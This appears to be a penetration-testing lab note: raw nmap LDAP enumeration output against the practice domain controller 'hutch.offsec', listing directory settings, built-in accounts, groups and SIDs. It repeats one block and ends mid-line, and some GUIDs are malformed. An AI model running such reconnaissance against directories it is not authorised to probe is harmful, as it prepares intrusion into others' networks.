# LDAP ``` PORT STATE SERVICE VERSION 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec, Site: Default-First-Site-Name) | ldap-rootdse: | LDAP Results | | domainFunctionality: 7 | forestFunctionality: 7 | domainControllerFunctionality: 7 | rootDomainNamingContext: DC=hutch,DC=offsec | ldapServiceName: hutch.offsec:hutchdc$@HUTCH.OFFSEC | isGlobalCatalogReady: TRUE | supportedSASLMechanisms: GSSAPI | supportedSASLMechanisms: GSS-SPNEGO | supportedSASLMechanisms: EXTERNAL | supportedSASLMechanisms: DIGEST-MD5 | supportedLDAPVersion: 3 | supportedLDAPVersion: 2 | supportedLDAPPolicies: MaxPoolThreads | supportedLDAPPolicies: MaxPercentDirSyncRequests | supportedLDAPPolicies: MaxDatagramRecv | supportedLDAPPolicies: MaxReceiveBuffer | supportedLDAPPolicies: InitRecvTimeout | supportedLDAPPolicies: MaxConnections | supportedLDAPPolicies: MaxConnIdleTime | supportedLDAPPolicies: MaxPageSize | supportedLDAPPolicies: MaxBatchReturnMessages | supportedLDAPPolicies: MaxQueryDuration | supportedLDAPPolicies: MaxDirSyncDuration | supportedLDAPPolicies: MaxTempTableSize | supportedLDAPPolicies: MaxResultSetSize | supportedLDAPPolicies: MinResultSets | supportedLDAPPolicies: MaxResultSetsPerConn | supportedLDAPPolicies: MaxNotificationPerConn | supportedLDAPPolicies: MaxValRange | supportedLDAPPolicies: MaxValRangeTransitive | supportedLDAPPolicies: ThreadMemoryLimit | supportedLDAPPolicies: SystemMemoryLimitPercent | supportedControl: 1.2.840.113556.1.4.319 | supportedControl: 1.2.840.113556.1.4.801 | supportedControl: 1.2.840.113556.1.4.473 | supportedControl: 1.2.840.113556.1.4.528 | supportedControl: 1.2.840.113556.1.4.417 | supportedControl: 1.2.840.113556.1.4.619 | supportedControl: 1.2.840.113556.1.4.841 | supportedControl: 1.2.840.113556.1.4.529 | supportedControl: 1.2.840.113556.1.4.805 | supportedControl: 1.2.840.113556.1.4.521 | supportedControl: 1.2.840.113556.1.4.970 | supportedControl: 1.2.840.113556.1.4.1338 | supportedControl: 1.2.840.113556.1.4.474 | supportedControl: 1.2.840.113556.1.4.1339 | supportedControl: 1.2.840.113556.1.4.1340 | supportedControl: 1.2.840.113556.1.4.1413 | supportedControl: 2.16.840.1.113730.3.4.9 | supportedControl: 2.16.840.1.113730.3.4.10 | supportedControl: 1.2.840.113556.1.4.1504 | supportedControl: 1.2.840.113556.1.4.1852 | supportedControl: 1.2.840.113556.1.4.802 | supportedControl: 1.2.840.113556.1.4.1907 | supportedControl: 1.2.840.113556.1.4.1948 | supportedControl: 1.2.840.113556.1.4.1974 | supportedControl: 1.2.840.113556.1.4.1341 | supportedControl: 1.2.840.113556.1.4.2026 | supportedControl: 1.2.840.113556.1.4.2064 | supportedControl: 1.2.840.113556.1.4.2065 | supportedControl: 1.2.840.113556.1.4.2066 | supportedControl: 1.2.840.113556.1.4.2090 | supportedControl: 1.2.840.113556.1.4.2205 | supportedControl: 1.2.840.113556.1.4.2204 | supportedControl: 1.2.840.113556.1.4.2206 | supportedControl: 1.2.840.113556.1.4.2211 | supportedControl: 1.2.840.113556.1.4.2239 | supportedControl: 1.2.840.113556.1.4.2255 | supportedControl: 1.2.840.113556.1.4.2256 | supportedControl: 1.2.840.113556.1.4.2309 | supportedControl: 1.2.840.113556.1.4.2330 | supportedControl: 1.2.840.113556.1.4.2354 | supportedCapabilities: 1.2.840.113556.1.4.800 | supportedCapabilities: 1.2.840.113556.1.4.1670 | supportedCapabilities: 1.2.840.113556.1.4.1791 | supportedCapabilities: 1.2.840.113556.1.4.1935 | supportedCapabilities: 1.2.840.113556.1.4.2080 | supportedCapabilities: 1.2.840.113556.1.4.2237 | subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | serverName: CN=HUTCHDC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=hutch,DC=offsec | schemaNamingContext: CN=Schema,CN=Configuration,DC=hutch,DC=offsec | namingContexts: DC=hutch,DC=offsec | namingContexts: CN=Configuration,DC=hutch,DC=offsec | namingContexts: CN=Schema,CN=Configuration,DC=hutch,DC=offsec | namingContexts: DC=DomainDnsZones,DC=hutch,DC=offsec | namingContexts: DC=ForestDnsZones,DC=hutch,DC=offsec | isSynchronized: TRUE | highestCommittedUSN: 75492 | dsServiceName: CN=NTDS Settings,CN=HUTCHDC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=hutch,DC=offsec | dnsHostName: hutchdc.hutch.offsec | defaultNamingContext: DC=hutch,DC=offsec | currentTime: 20220713194237.0Z |_ configurationNamingContext: CN=Configuration,DC=hutch,DC=offsec | ldap-search: | Context: DC=hutch,DC=offsec | dn: DC=hutch,DC=offsec | dn: CN=Administrator,CN=Users,DC=hutch,DC=offsec | dn: CN=Guest,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: person | objectClass: organizationalPerson | objectClass: user | cn: Guest | description: Built-in account for guest access to the computer/domain | distinguishedName: CN=Guest,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:25:40 UTC | whenChanged: 2020/11/04 05:25:40 UTC | uSNCreated: 8197 | memberOf: CN=Guests,CN=Builtin,DC=hutch,DC=offsec | uSNChanged: 8197 | name: Guest | objectGUID: 044ab54-390-f248-bc3c-a441b3bc47f8 | userAccountControl: 66082 | badPwdCount: 0 | codePage: 0 | countryCode: 0 | badPasswordTime: Never | lastLogoff: 0 | lastLogon: Never | pwdLastSet: Never | primaryGroupID: 514 | objectSid: 1-5-21-2216925765-458455009-2806096489-501 | accountExpires: 30828-09-14T06:57:29+00:00 | logonCount: 0 | sAMAccountName: Guest | sAMAccountType: 805306368 | objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | isCriticalSystemObject: TRUE | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=krbtgt,CN=Users,DC=hutch,DC=offsec | dn: CN=Domain Computers,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Domain Computers | description: All workstations and servers joined to the domain | distinguishedName: CN=Domain Computers,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12330 | uSNChanged: 12332 | name: Domain Computers | objectGUID: bf57e04a-cee1-fd4a-b485-2f62b5d85cee | objectSid: 1-5-21-2216925765-458455009-2806096489-515 | sAMAccountName: Domain Computers | sAMAccountType: 268435456 | groupType: -2147483646 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | isCriticalSystemObject: TRUE | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=Domain Controllers,CN=Users,DC=hutch,DC=offsec | dn: CN=Schema Admins,CN=Users,DC=hutch,DC=offsec | dn: CN=Enterprise Admins,CN=Users,DC=hutch,DC=offsec | dn: CN=Cert Publishers,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Cert Publishers | description: Members of this group are permitted to publish certificates to the directory | distinguishedName: CN=Cert Publishers,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12342 | memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec | uSNChanged: 12344 | name: Cert Publishers | objectGUID: df7594ea-e87f-bf40-8148-c9d1a63ca68c | objectSid: 1-5-21-2216925765-458455009-2806096489-517 | sAMAccountName: Cert Publishers | sAMAccountType: 536870912 | groupType: -2147483644 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | isCriticalSystemObject: TRUE | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=Domain Admins,CN=Users,DC=hutch,DC=offsec | dn: CN=Domain Users,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Domain Users | description: All domain users | distinguishedName: CN=Domain Users,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12348 | memberOf: CN=Users,CN=Builtin,DC=hutch,DC=offsec | uSNChanged: 12350 | name: Domain Users | objectGUID: 2803cd3-fced-d543-8a4-a6dfd0de8541 | objectSid: 1-5-21-2216925765-458455009-2806096489-513 | sAMAccountName: Domain Users | sAMAccountType: 268435456 | groupType: -2147483646 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | isCriticalSystemObject: TRUE | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=Domain Guests,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Domain Guests | description: All domain guests | distinguishedName: CN=Domain Guests,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12351 | memberOf: CN=Guests,CN=Builtin,DC=hutch,DC=offsec | uSNChanged: 12353 | name: Domain Guests | objectGUID: ba7583f0-90f-94a-8525-51adcc21367b | objectSid: 1-5-21-2216925765-458455009-2806096489-514 | sAMAccountName: Domain Guests | sAMAccountType: 268435456 | groupType: -2147483646 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | isCriticalSystemObject: TRUE | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=Group Policy Creator Owners,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Group Policy Creator Owners | description: Members in this group can modify group policy for the domain | member: CN=Administrator,CN=Users,DC=hutch,DC=offsec | distinguishedName: CN=Group Policy Creator Owners,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12354 | memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec | uSNChanged: 12391 | name: Group Policy Creator Owners | objectGUID: 20f62f8-c24-a64f-9191-289c1149958 | objectSid: 1-5-21-2216925765-458455009-2806096489-520 | sAMAccountName: Group Policy Creator Owners | sAMAccountType: 268435456 | groupType: -2147483646 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | isCriticalSystemObject: TRUE | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=RAS and IAS Servers,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: RAS and IAS Servers | description: Servers in this group can access remote access properties of users | distinguishedName: CN=RAS and IAS Servers,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12357 | uSNChanged: 12359 | name: RAS and IAS Servers | objectGUID: 76c688f-de10-7e4d-8cd1-7327f0532256 | objectSid: 1-5-21-2216925765-458455009-2806096489-553 | sAMAccountName: RAS and IAS Servers | sAMAccountType: 536870912 | groupType: -2147483644 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | isCriticalSystemObject: TRUE | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Allowed RODC Password Replication Group | description: Members in this group can have their passwords replicated to all read-only domain controllers in the domain | distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12402 | uSNChanged: 12404 | name: Allowed RODC Password Replication Group | objectGUID: 71f24ae4-97-a34d-a932-d7fc7124d21 | objectSid: 1-5-21-2216925765-458455009-2806096489-571 | sAMAccountName: Allowed RODC Password Replication Group | sAMAccountType: 536870912 | groupType: -2147483644 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | isCriticalSystemObject: TRUE | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Denied RODC Password Replication Group | description: Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain | member: CN=Read-only Domain Controllers,CN=Users,DC=hutch,DC=offsec | member: CN=Group Policy Creator Owners,CN=Users,DC=hutch,DC=offsec | member: CN=Domain Admins,CN=Users,DC=hutch,DC=offsec | member: CN=Cert Publishers,CN=Users,DC=hutch,DC=offsec | member: CN=Enterprise Admins,CN=Users,DC=hutch,DC=offsec | member: CN=Schema Admins,CN=Users,DC=hutch,DC=offsec | member: CN=Domain Controllers,CN=Users,DC=hutch,DC=offsec | member: CN=krbtgt,CN=Users,DC=hutch,DC=offsec | distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12405 | uSNChanged: 12433 | name: Denied RODC Password Replication Group | objectGUID: 1e2a4623-2fb7-e14f-b2ac-f2b2f232fb60 | objectSid: 1-5-21-2216925765-458455009-2806096489-572 | sAMAccountName: Denied RODC Password Replication Group | sAMAccountType: 536870912 | groupType: -2147483644 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | isCriticalSystemObject: TRUE | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=Read-only Domain Controllers,CN=Users,DC=hutch,DC=offsec | dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Enterprise Read-only Domain Controllers | description: Members of this group are Read-Only Domain Controllers in the enterprise | distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12429 | uSNChanged: 12431 | name: Enterprise Read-only Domain Controllers | objectGUID: 42844bc6-c387-f947-a4be-989c3580f2ab | objectSid: 1-5-21-2216925765-458455009-2806096489-498 | sAMAccountName: Enterprise Read-only Domain Controllers | sAMAccountType: 268435456 | groupType: -2147483640 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | isCriticalSystemObject: TRUE | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=Cloneable Domain Controllers,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Cloneable Domain Controllers | description: Members of this group that are domain controllers may be cloned. | distinguishedName: CN=Cloneable Domain Controllers,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12440 | uSNChanged: 12442 | name: Cloneable Domain Controllers | objectGUID: 178be320-6cb-1d4f-acce-7f87d6419286 | objectSid: 1-5-21-2216925765-458455009-2806096489-522 | sAMAccountName: Cloneable Domain Controllers | sAMAccountType: 268435456 | groupType: -2147483646 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | isCriticalSystemObject: TRUE | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=Protected Users,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Protected Users | description: Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information. | distinguishedName: CN=Protected Users,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12445 | uSNChanged: 12447 | name: Protected Users | objectGUID: 9f5e98-fe2c-3b4a-bf7e-c0d7c791ce86 | objectSid: 1-5-21-2216925765-458455009-2806096489-525 | sAMAccountName: Protected Users | sAMAccountType: 268435456 | groupType: -2147483646 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | isCriticalSystemObject: TRUE | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | | |_Result limited to 20 objects (see ldap.maxobjects) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec, Site: Default-First-Site-Name) | ldap-search: | Context: DC=hutch,DC=offsec | dn: DC=hutch,DC=offsec | dn: CN=Configuration,DC=hutch,DC=offsec | dn: CN=Schema,CN=Configuration,DC=hutch,DC=offsec | dn: CN=Administrator,CN=Users,DC=hutch,DC=offsec | dn: CN=Guest,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: person | objectClass: organizationalPerson | objectClass: user | cn: Guest | description: Built-in account for guest access to the computer/domain | distinguishedName: CN=Guest,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:25:40 UTC | whenChanged: 2020/11/04 05:25:40 UTC | uSNCreated: 8197 | memberOf: CN=Guests,CN=Builtin,DC=hutch,DC=offsec | uSNChanged: 8197 | name: Guest | objectGUID: 044ab54-390-f248-bc3c-a441b3bc47f8 | userAccountControl: 66082 | primaryGroupID: 514 | objectSid: 1-5-21-2216925765-458455009-2806096489-501 | sAMAccountName: Guest | sAMAccountType: 805306368 | objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=krbtgt,CN=Users,DC=hutch,DC=offsec | dn: CN=Domain Computers,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Domain Computers | description: All workstations and servers joined to the domain | distinguishedName: CN=Domain Computers,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12330 | uSNChanged: 12332 | name: Domain Computers | objectGUID: bf57e04a-cee1-fd4a-b485-2f62b5d85cee | objectSid: 1-5-21-2216925765-458455009-2806096489-515 | sAMAccountName: Domain Computers | sAMAccountType: 268435456 | groupType: -2147483646 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=Domain Controllers,CN=Users,DC=hutch,DC=offsec | dn: CN=Schema Admins,CN=Users,DC=hutch,DC=offsec | dn: CN=Enterprise Admins,CN=Users,DC=hutch,DC=offsec | dn: CN=Cert Publishers,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Cert Publishers | description: Members of this group are permitted to publish certificates to the directory | distinguishedName: CN=Cert Publishers,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12342 | memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec | uSNChanged: 12344 | name: Cert Publishers | objectGUID: df7594ea-e87f-bf40-8148-c9d1a63ca68c | objectSid: 1-5-21-2216925765-458455009-2806096489-517 | sAMAccountName: Cert Publishers | sAMAccountType: 536870912 | groupType: -2147483644 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=Domain Admins,CN=Users,DC=hutch,DC=offsec | dn: CN=Domain Users,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Domain Users | description: All domain users | distinguishedName: CN=Domain Users,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12348 | memberOf: CN=Users,CN=Builtin,DC=hutch,DC=offsec | uSNChanged: 12350 | name: Domain Users | objectGUID: 2803cd3-fced-d543-8a4-a6dfd0de8541 | objectSid: 1-5-21-2216925765-458455009-2806096489-513 | sAMAccountName: Domain Users | sAMAccountType: 268435456 | groupType: -2147483646 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=Domain Guests,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Domain Guests | description: All domain guests | distinguishedName: CN=Domain Guests,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12351 | memberOf: CN=Guests,CN=Builtin,DC=hutch,DC=offsec | uSNChanged: 12353 | name: Domain Guests | objectGUID: ba7583f0-90f-94a-8525-51adcc21367b | objectSid: 1-5-21-2216925765-458455009-2806096489-514 | sAMAccountName: Domain Guests | sAMAccountType: 268435456 | groupType: -2147483646 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=Group Policy Creator Owners,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Group Policy Creator Owners | description: Members in this group can modify group policy for the domain | member: CN=Administrator,CN=Users,DC=hutch,DC=offsec | distinguishedName: CN=Group Policy Creator Owners,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12354 | memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec | uSNChanged: 12391 | name: Group Policy Creator Owners | objectGUID: 20f62f8-c24-a64f-9191-289c1149958 | objectSid: 1-5-21-2216925765-458455009-2806096489-520 | sAMAccountName: Group Policy Creator Owners | sAMAccountType: 268435456 | groupType: -2147483646 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=RAS and IAS Servers,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: RAS and IAS Servers | description: Servers in this group can access remote access properties of users | distinguishedName: CN=RAS and IAS Servers,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12357 | uSNChanged: 12359 | name: RAS and IAS Servers | objectGUID: 76c688f-de10-7e4d-8cd1-7327f0532256 | objectSid: 1-5-21-2216925765-458455009-2806096489-553 | sAMAccountName: RAS and IAS Servers | sAMAccountType: 536870912 | groupType: -2147483644 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Allowed RODC Password Replication Group | description: Members in this group can have their passwords replicated to all read-only domain controllers in the domain | distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12402 | uSNChanged: 12404 | name: Allowed RODC Password Replication Group | objectGUID: 71f24ae4-97-a34d-a932-d7fc7124d21 | objectSid: 1-5-21-2216925765-458455009-2806096489-571 | sAMAccountName: Allowed RODC Password Replication Group | sAMAccountType: 536870912 | groupType: -2147483644 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Denied RODC Password Replication Group | description: Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain | member: CN=Read-only Domain Controllers,CN=Users,DC=hutch,DC=offsec | member: CN=Group Policy Creator Owners,CN=Users,DC=hutch,DC=offsec | member: CN=Domain Admins,CN=Users,DC=hutch,DC=offsec | member: CN=Cert Publishers,CN=Users,DC=hutch,DC=offsec | member: CN=Enterprise Admins,CN=Users,DC=hutch,DC=offsec | member: CN=Schema Admins,CN=Users,DC=hutch,DC=offsec | member: CN=Domain Controllers,CN=Users,DC=hutch,DC=offsec | member: CN=krbtgt,CN=Users,DC=hutch,DC=offsec | distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12405 | uSNChanged: 12433 | name: Denied RODC Password Replication Group | objectGUID: 1e2a4623-2fb7-e14f-b2ac-f2b2f232fb60 | objectSid: 1-5-21-2216925765-458455009-2806096489-572 | sAMAccountName: Denied RODC Password Replication Group | sAMAccountType: 536870912 | groupType: -2147483644 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | dn: CN=Read-only Domain Controllers,CN=Users,DC=hutch,DC=offsec | dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=hutch,DC=offsec | objectClass: top | objectClass: group | cn: Enterprise Read-only Domain Controllers | description: Members of this group are Read-Only Domain Controllers in the enterprise | distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=hutch,DC=offsec | instanceType: 4 | whenCreated: 2020/11/04 05:26:23 UTC | whenChanged: 2020/11/04 05:26:23 UTC | uSNCreated: 12429 | uSNChanged: 12431 | name: Enterprise Read-only Domain Controllers | objectGUID: 42844bc6-c387-f947-a4be-989c3580f2ab | objectSid: 1-5-21-2216925765-458455009-2806096489-498 | sAMAccountName: Enterprise Read-only Domain Controllers | sAMAccountType: 268435456 | groupType: -2147483640 | objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=hutch,DC=offsec | dSCorePropagationData: 2020/11/04 05:35:13 UTC | dSCorePropagationData: 2020/11/04 05:26:23 UTC | dSCorePropagationData: 1601/01/01 00:04:17 UTC | | |_Result limited to 20 objects (see ldap.maxobjects) | ldap-rootdse: | LDAP Results | | domainFunctionality: 7 | forestFunctionality: 7 | domainControllerFunctionality: 7 | rootDomainNamingContext: DC=hutch,DC=offsec | ldapServiceName: hutch.offsec:hutchdc$@HUTCH.OFFSEC | isGlobalCatalogReady: TRUE | supportedSASLMechanisms: GSSAPI | supportedSASLMechanisms: GSS-SPNEGO | supportedSASLMechanisms: EXTERNAL | supportedSASLMechanisms: DIGEST-MD5 | supportedLDAPVersion: 3 | supportedLDAPVersion: 2 | supportedLDAPPolicies: MaxPoolThreads | supportedLDAPPolicies: MaxPercentDirSyncRequests | supportedLDAPPolicies: MaxDatagramRecv | supportedLDAPPolicies: MaxReceiveBuffer | supportedLDAPPolicies: InitRecvTimeout | supportedLDAPPolicies: MaxConnections | supportedLDAPPolicies: MaxConnIdleTime | supportedLDAPPolicies: MaxPageSize | supportedLDAPPolicies: MaxBatchReturnMessages | supportedLDAPPolicies: MaxQueryDuration | supportedLDAPPolicies: MaxDirSyncDuration | supportedLDAPPolicies: MaxTempTableSize | supportedLDAPPolicies: MaxResultSetSize | supportedLDAPPolicies: MinResultSets | supportedLDAPPolicies: MaxResultSetsPerConn | supportedLDAPPolicies: MaxNotificationPerConn | supportedLDAPPolicies: MaxValRange | supportedLDAPPolicies: MaxValRangeTransitive | supportedLDAPPolicies: ThreadMemoryLimit | supportedLDAPPolicies: 